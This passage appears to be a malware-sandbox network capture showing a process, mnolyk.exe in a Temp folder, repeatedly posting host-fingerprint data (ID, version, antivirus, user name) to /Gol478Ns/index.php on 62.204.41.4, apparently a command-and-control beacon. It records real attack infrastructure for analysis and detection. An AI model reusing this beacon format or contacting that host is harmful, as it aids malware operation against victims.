Feb 7, 2023 20:03:01.662458897 CET	599	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:01.726902008 CET	599	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
452	192.168.2.6	50176	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:01.908838034 CET	600	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:01.974292994 CET	600	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
453	192.168.2.6	50177	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:02.166311026 CET	601	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:02.231512070 CET	601	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
454	192.168.2.6	50178	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:02.400607109 CET	602	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:02.463025093 CET	602	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
455	192.168.2.6	50179	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:02.638946056 CET	603	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:02.702853918 CET	603	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
456	192.168.2.6	50180	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:02.871685982 CET	604	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:02.937747002 CET	604	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
457	192.168.2.6	50182	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:03.137172937 CET	611	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:03.200685024 CET	612	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
458	192.168.2.6	50183	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:03.375286102 CET	613	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:03.439560890 CET	613	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
459	192.168.2.6	50184	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:03.616189957 CET	614	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:03.680015087 CET	614	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.6	49765	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:02.096121073 CET	159	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:02.162086964 CET	159	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
460	192.168.2.6	50185	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:03.865291119 CET	615	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:03.927962065 CET	615	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
461	192.168.2.6	50186	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:04.107235909 CET	616	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:04.172255039 CET	616	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
462	192.168.2.6	50187	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:04.340648890 CET	617	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:04.403584957 CET	617	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
463	192.168.2.6	50188	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:04.590702057 CET	618	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:04.655025959 CET	618	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
464	192.168.2.6	50189	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:04.831774950 CET	619	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:04.896188974 CET	619	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
465	192.168.2.6	50190	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:05.082669020 CET	620	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:05.148695946 CET	620	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
466	192.168.2.6	50191	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:05.327790976 CET	621	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:05.391647100 CET	621	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
467	192.168.2.6	50192	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:05.567548990 CET	622	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:05.630932093 CET	622	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
468	192.168.2.6	50193	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:05.833350897 CET	623	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:05.898107052 CET	623	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
469	192.168.2.6	50194	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:06.078732967 CET	623	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:06.141968012 CET	624	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.6	49766	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:02.341784954 CET	160	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:02.408010006 CET	160	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
470	192.168.2.6	50195	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:06.319605112 CET	625	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
